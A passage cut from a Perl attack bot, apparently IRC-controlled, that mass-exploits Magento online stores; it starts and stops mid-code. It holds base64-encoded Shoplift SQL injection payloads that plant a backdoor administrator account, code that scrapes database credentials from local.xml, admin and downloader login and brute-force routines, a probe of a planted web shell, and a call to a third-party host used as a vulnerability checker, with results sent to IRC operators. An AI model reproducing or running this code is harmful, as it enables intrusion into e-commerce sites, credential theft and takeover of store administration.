"/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; # black my $cmswy2 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBtYWdlbnRvX2FkbWluX3VzZXJgIFdIRVJFIHVzZXJuYW1lPSdkbGMnO0RFTEVURSBGUk9NIGBtYWdlbnRvX2FkbWluX3JvbGVgIFdIRVJFIHVzZXJfaWQ9Njk2OTtJTlNFUlQgSU5UTyBgbWFnZW50b19hZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBtYWdlbnRvX2FkbWluX3JvbGVgIChgcGFyZW50X2lkYCxgdHJlZV9sZXZlbGAsYHNvcnRfb3JkZXJgLGByb2xlX3R5cGVgLGB1c2VyX2lkYCxgcm9sZV9uYW1lYCkgVkFMVUVTICgxLDIsMCwnVScsNjk2OSwnZGV2ZWxvcGVyJyk7OyAtLSA="; # magento_admin_user my $cmswy3 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBtYWdlX2FkbWluX3VzZXJgIFdIRVJFIHVzZXJuYW1lPSdkbGMnO0RFTEVURSBGUk9NIGBtYWdlX2FkbWluX3JvbGVgIFdIRVJFIHVzZXJfaWQ9Njk2OTtJTlNFUlQgSU5UTyBgbWFnZV9hZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBtYWdlX2FkbWluX3JvbGVgIChgcGFyZW50X2lkYCxgdHJlZV9sZXZlbGAsYHNvcnRfb3JkZXJgLGByb2xlX3R5cGVgLGB1c2VyX2lkYCxgcm9sZV9uYW1lYCkgVkFMVUVTICgxLDIsMCwnVScsNjk2OSwnZGV2ZWxvcGVyJyk7OyAtLSA="; # mage_admin_user my $cmswy4 = "/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBtZ19hZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nZGxjJztERUxFVEUgRlJPTSBgbWdfYWRtaW5fcm9sZWAgV0hFUkUgdXNlcl9pZD02OTY5O0lOU0VSVCBJTlRPIGBtZ19hZG1pbl91c2VyYCAoYHVzZXJfaWRgLGBmaXJzdG5hbWVgLGBsYXN0bmFtZWAsYGVtYWlsYCxgdXNlcm5hbWVgLGBwYXNzd29yZGAsYGNyZWF0ZWRgLGBtb2RpZmllZGAsYGxvZ2RhdGVgLGBsb2dudW1gLGByZWxvYWRfYWNsX2ZsYWdgLGBpc19hY3RpdmVgLGBleHRyYWApIFZBTFVFUyAoNjk2OSwnbWFnZW50bycsJ2RldmVsb3BlcicsJ2RldmVsb3BlckBtYWdlbnRvY29tbWVyY2UuY29tJywnZGxjJywnY2ExZTY1MDdhNjMyYjA5ZDUwMDJhZjZiMmZjNzc5ZWU6TVEnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLDEsMCwxLCdOOycpO0lOU0VSVCBJTlRPIGBtZ19hZG1pbl9yb2xlYCAoYHBhcmVudF9pZGAsYHRyZWVfbGV2ZWxgLGBzb3J0X29yZGVyYCxgcm9sZV90eXBlYCxgdXNlcl9pZGAsYHJvbGVfbmFtZWApIFZBTFVFUyAoMSwyLDAsJ1UnLDY5NjksJ2RldmVsb3BlcicpOzsgLS0g"; # mg_admin_user if(my $pid = fork){ waitpid($pid, 0); } else { if(fork){ exit; } else { &Query("http://".$site."/admin/".$cmswy1); &Query("http://".$site."index.php/admin/".$cmswy1); my $situs = "http://".$site."downloader/index.php"; my $check = &Query($situs); if($check =~ /Magento Downloader/i) { my $package; my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ my $res = &mslAdmin($situs); if($res =~ /form\.install_package_id\.value/i){ $package.="[ 0,1Login success ]"; } if($res =~ /File_System/i){ $package.="[ 13,1File_System ]"; } if($res =~ /kontol_module/i){ $package.="[ 13,1kontol_module ]"; } if($res =~ /Grizzly3_MassEmail/i){ $package.="[ 13Grizzly3_MassEmail ]"; } if($res =~ /Grizzly_MassEmail/i){ $package.="[ 13Grizzly_MassEmail ]"; } if($res =~ /LibMagen_Ext/i){ $package.="[ 13LibMagen_Ext ]"; } if($res =~ /Magento_Mass/i){ $package.="[ 13Exploiter ]"; } if($res =~ /not have sufficient write permission/i){ $package.="[ 4Permission denied ]"; } if($package){ if($package !~ /Permission denied/){ &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] ".$package); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] ".$package); } &msg("$channel","![4SHOPLIFT]! [ 12Success ] ".$package); &WriteLogs("MSL.URL",md5_hex($site)); &chkdownload($site,$dirs,$chan,$engine); } else { &msxAdmin($site); } } else { &msg("$channel","![13X]! skipping: 14".$site." ![13*]!"); } my $magen = &Query($magmo); if($magen =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($magen =~ /host?\s\=?\s\"(.*)\"/i) { $hozz = $1; } if($magen =~ /dbname?\s\=?\s\"(.*)\"/i) { $base = $1; } if($magen =~ /user?\s\=?\s\"(.*)\"/i) { $user = $1; } if($magen =~ /password?\s\=?\s\"(.*)\"/i) { $pass = $1; } &mageAuth($site, $hozz, $user, $pass, $base); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $hozz, $user, $pass, $base); &dbConnect($site, $hozz, $user, $pass, $base); } else { &Query("http://".$site."/admin/".$cmswy1); my $sitos = "http://".$site."downloader/index.php"; my $testa = "http://www.globalrelax.it//wp-admin/includes/tmpx/conf.php?target=http://".$site."/"; my $choock = &mslAdmin($sitos); if($choock =~ /Magento Downloader/i) { my $htmla = &Query($testa); &Query($sitos); if ($htmla =~ /is vulnerable/) { my $xteam = "http://".$site."/cloud.php"; my $oscheck = &Query($xteam."?silk"); if ($oscheck =~ /Uname : (.*?)<\/B><BR>/i){ $infeno = $1; } &msg("$chanx","![4SHOPLIFT]! [ 12Shell ] [ 14Uname:".$infeno." ]"); &msg("$admin","![4MSL-Vuln]! [ 14".$infeno." ] [12 http://".$xteam."?silk ] $dork "); &msg("$wakil","![4MSL-Vuln]! [ 14".$infeno." ] [12 http://".$xteam."?silk ] $dork "); } } } } } my $magon = &Query($magma); if($magon =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($magon =~ /host?\s\=?\s\"(.*)\"/i) { $hozz = $1; } if($magon =~ /dbname?\s\=?\s\"(.*)\"/i) { $base = $1; } if($magon =~ /user?\s\=?\s\"(.*)\"/i) { $user = $1; } if($magon =~ /password?\s\=?\s\"(.*)\"/i) { $pass = $1; } &mageAuth($site, $hozz, $user, $pass, $base); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $hozz, $user, $pass, $base); &dbConnect($site, $hozz, $user, $pass, $base); } } } my $htmlx = &Query($testx); if($htmlx =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($htmlx =~ /host><\!\[\[CDATA\[(.*?)\]\]><\/host/i){ $hoss = $1; } if($htmlx =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $uzer = $1; } if($htmlx =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $pazz = $1; } if($htmlx =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dirz = $1; } if($htmlx =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $pref = $1; } if($htmlx =~ /dbname><\!\[CDATA\[(.*?)\]\]><\/dbname/i){ $baze = $1; } &msg("$channel","![13X]! Exploiting (1): 14".$site.$dirz." ![13*]!"); &mageAuth($site, $hoss, $uzer, $pazz, $baze); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $hoss, $uzer, $pazz, $baze); &dbConnect($site, $hoss, $uzer, $pazz, $baze); } &Query("http://".$site.$dirz.$cmswy1); my $sites = "http://".$site."downloader/index.php"; my $chock = &Query($sites); if($chock =~ /Magento Downloader/i) { my $res = &mslAdmin($sites); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirz." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirz." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } my $sitas = "http://".$site.$dirz; my $chack = &Query($sitas); if($chack =~ /Password/i) { &msg("$channel","![13X]! Exploiting (2): 14".$site.$dirz." ![13*]!"); my $res = &mslAdmin($sitez); if($res =~ /Dashboard/i) { &msg("$admin","![7SHOPLIFT]! [ 12http://".$site.$dirz." ] [ 7Directory ]"); &msg("$wakil","![7SHOPLIFT]! [ 12http://".$site.$dirz." ] [ 7Directory ]"); &msg("$channel","![7SHOPLIFT]! [ 12Found ] [ 7Directory ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } } } my $magun = &Query($magme); if($magun =~ /dbname/i){ my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ if($magun =~ /host><\!\[\[CDATA\[(.*?)\]\]><\/host/i){ $huss = $1; } if($magun =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $uzir = $1; } if($magun =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $puzz = $1; } if($magun =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dorz = $1; } if($magun =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $praf = $1; } if($magun =~ /dbname><\!\[CDATA\[(.*)\]\]><\/dbname/i){ $bazi = $1; } &msg("$channel","![13X]! Exploiting (3): 14".$site.$dorz." ![13*]!"); &mageAuth($site, $huss, $uzir, $puzz, $bazi); &mageDown($site); if($sqlview == 1){ &mageSQL($site, $huss, $uzir, $puzz, $bazi); &dbConnect($site, $huss, $uzir, $puzz, $bazi); } &Query("http://".$site.$dorz.$cmswy1); my $sitez = "http://".$site."downloader/"; my $zhock = &Query($sitez); if($zhock =~ /Magento Downloader/i) { my $res = &mslAdmin($sitez); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dorz." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dorz." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } my $sitaz = "http://".$site.$dorz; my $chack = &Query($sitaz); if($chack =~ /Password/i) { &msg("$channel","![13X]! Exploiting (4): 14".$site.$dorz." ![13*]!"); my $res = &mslAdmin($sitaz); if($res =~ /Dashboard/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site.$dorz." ] [ 7Admin page ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site.$dorz." ] [ 7Admin page ]"); &msg("$channel","![4SHOPLIFT]! [ 12Found ] [ 7Admin page ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } } } my $axxem = &mageQuery($tostx, "app/etc/local.xml"); if($axxem =~ /host><\!\[CDATA\[(.*?)\]\]><\/host/i){ $xozz = $1; if($axxem =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $xser = $1; } if($axxem =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $xass = $1; } if($axxem =~ /dbname><\!\[CDATA\[(.*?)\]\]><\/dbname/i){ $xase = $1; } if($axxem =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dirx = $1; } if($axxem =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $pfix = $1; } my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ &msg("$channel","![4X]! Exploiting (5): 14".$site." ![13*]!"); if($mageforce == 0){ &mageConnect($tostx); &mageAuth($site, $xozz, $xser, $xass, $xase); if($sqlview == 1){ &mageSQL($site, $xozz, $xser, $xass, $xase); } } else { &mageBrute($site, $tostx); } &Query("http://".$site.$dirx.$cmswy1); my $sitix = "http://".$site."downloader/index.php"; my $res = &mslAdmin($sitix); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } my $satos = "http://".$site.$dirx; my $chick = &Query($satos); if($chick =~ /Password/i) { &msg("$channel","![4X]! Exploiting (6): 14Start ![13*]!"); my $res = &mslAdmin($satos); if($res =~ /Dashboard/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } my $testsql = "http://".$site."admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $fz = &get_content($testsql); my $url = "http://".$site."/admin/index.php"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "black"; my $password = "panthers"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $filesystem = ($res2 =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "9Installed" : "0Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "9Writable"; #my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; #my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![4SHOPLIFT]! 12".$url." 4<9=4> 12 File_System = $m_fs & Downloader = $m_perm  black panthers![13*]!"); &msg("$channel","![4SHOPLIFT]! 12LOGIN11 [8Success11]12 Balance11 [9 ".$price." 11]12 File_System = $m_fs14 &12 Downloader = $m_perm  ![13*]!"); } } } } } } my $axxem = &mageQuery($tastx, "app/etc/local.xml"); if($axxem =~ /host><\!\[CDATA\[(.*?)\]\]><\/host/i){ $xozz = $1; if($axxem =~ /username><\!\[CDATA\[(.*?)\]\]><\/username/i){ $xser = $1; } if($axxem =~ /password><\!\[CDATA\[(.*?)\]\]><\/password/i){ $xass = $1; } if($axxem =~ /dbname><\!\[CDATA\[(.*?)\]\]><\/dbname/i){ $xase = $1; } if($axxem =~ /frontName><\!\[CDATA\[(.*?)\]\]><\/frontName/i){ $dirx = $1; } if($axxem =~ /table_prefix><\!\[CDATA\[(.*?)\]\]><\/table_prefix/i){ $pfix = $1; } my $chkurl = &ReadLogs("MSL.URL",md5_hex($site)); if($chkurl == 0){ &msg("$channel","![4X]! Exploiting (7): 14Starting ![13*]!"); if($mageforce == 0){ &mageConnect($tastx); &mageAuth($site, $xozz, $xser, $xass, $xase); if($sqlview == 1){ &mageSQL($site, $xozz, $xser, $xass, $xase); } } my $testsql = "http://".$site."admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $fz = &get_content($testsql); my $url = "http://".$site."/admin/index.php"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "black"; my $password = "panthers"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = $response->content; if($res =~ /<span class="price">(.*?)<\/span>/g) { my $price = $1; my $url2 = "http://".$site."/downloader"; my $ua2 = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua2->requests_redirectable(['GET', 'HEAD', 'POST']); $ua2->max_redirect(5); $ua2->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response2 = $ua2->request( POST "$url2", Content_Type => 'form-data', Content => [ "username" => $username, "password" => $password ] ); my $res2 = $response2->content; if($res2 =~ /Log Out/ig || $res2 =~/Return to Admin/ig) { my $filesystem = ($res2 =~ /File_System/ig) ? "Exists" : "Not exists"; my $permission = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; sleep(3); my $m_fs = ($filesystem eq "Exists") ? "9Installed" : "0Not Found"; my $m_perm = ($permission eq "Denied") ? "4Denied" : "9Writable"; #my $out = ($res2 =~ /Warning: Your Magento folder does not have sufficient write permissions/ig) ? 'Denied' : 'Writable'; #my $fs = ($res2 =~ /File_System/ig) ? "Installed" : "Not Install"; &msg("$admin","![4SHOPLIFT]! 12".$url." 4<9=4> 12 File_System = $m_fs & Downloader = $m_perm  black panthers![13*]!"); &msg("$channel","![4SHOPLIFT]! 12LOGIN11 [8Success11]12 Balance11 [9 ".$price." 11]12 File_System = $m_fs14 &12 Downloader = $m_perm  ![13*]!"); } } } else { &mageBrute($site, $tastx) } } } &Query("http://".$site.$dirx.$cmswy1); my $sitix = "http://".$site."downloader/index.php"; my $res = &mslAdmin($sitix); if($res =~ /Return to Admin/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } my $satos = "http://".$site.$dirx; my $chick = &Query($satos); if($chick =~ /Password/i) { &msg("$channel","![4X]! Exploiting (8): 14Begin ![13*]!"); my $res = &mslAdmin($satos); if($res =~ /Dashboard/i) { &msg("$admin","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$wakil","![4SHOPLIFT]! [ 12http://".$site."downloader/index.php ] [ 12http://".$site.$dirx." ] [ 3Login success ]"); &msg("$channel","![4SHOPLIFT]! [ 3Login success ]"); &WriteLogs("MSL.URL",md5_hex($site)); } } my $testsql = "http://".$site."admin/Cms_Wysiwyg/directive/?forwarded=true&isIframe=true&___directive=e3tibG9jayB0eXBlPSJhZG1pbmh0bWwvcmVwb3J0X3NlYXJjaF9ncmlkIn19&filter=bnVtX3Jlc3VsdHNbZnJvbV09MCZudW1fcmVzdWx0c1tmaWVsZF9leHByXT0xPTIpO0RFTEVURSBGUk9NIGBhZG1pbl91c2VyYCBXSEVSRSB1c2VybmFtZT0nYmxhY2snO0RFTEVURSBGUk9NIGBhZG1pbl9yb2xlYCBXSEVSRSB1c2VyX2lkPTY5Njk7SU5TRVJUIElOVE8gYGFkbWluX3VzZXJgIChgdXNlcl9pZGAsYGZpcnN0bmFtZWAsYGxhc3RuYW1lYCxgZW1haWxgLGB1c2VybmFtZWAsYHBhc3N3b3JkYCxgY3JlYXRlZGAsYG1vZGlmaWVkYCxgbG9nZGF0ZWAsYGxvZ251bWAsYHJlbG9hZF9hY2xfZmxhZ2AsYGlzX2FjdGl2ZWAsYGV4dHJhYCkgVkFMVUVTICg2OTY5LCdtYWdlbnRvJywnZGV2ZWxvcGVyJywnZGV2ZWxvcGVyQG1hZ2VudG9jb21tZXJjZS5jb20nLCdibGFjaycsJzdkMDdhMWRmODExMGZlNTUwYzZhZDJmODhkM2M3ZTk4JywnMjAxNS0wNS0wNSAwNTowNTowNScsJzIwMTUtMDUtMDUgMDU6MDU6MDUnLCcyMDE1LTA1LTA1IDA1OjA1OjA1JywxLDAsMSwnTjsnKTtJTlNFUlQgSU5UTyBgYWRtaW5fcm9sZWAgKGBwYXJlbnRfaWRgLGB0cmVlX2xldmVsYCxgc29ydF9vcmRlcmAsYHJvbGVfdHlwZWAsYHVzZXJfaWRgLGByb2xlX25hbWVgKSBWQUxVRVMgKDEsMiwwLCdVJyw2OTY5LCdkZXZlbG9wZXInKTs7IC0tIA=="; my $fz = &get_content($testsql); my $url = "http://".$site."/admin/index.php"; my $check = &get_content($url); if($check =~ /<input name="form_key" type="hidden" value="(.*?)" \/>/g) { my $username = "black"; my $password = "panthers"; my $key = $1; my $ua = LWP::UserAgent->new( keep_alive => 1, timeout => 120, agent => $uagent ); $ua->requests_redirectable(['GET', 'HEAD', 'POST']); $ua->max_redirect(5); $ua->cookie_jar(HTTP::Cookies->new(file => "cookies.txt", autosave => 1)); my $response = $ua->request( POST "$url", Content_Type => 'form-data', Content => [ "login[username]" => $username, "login[password]" => $password, "form_key" => $key ] ); my $res = 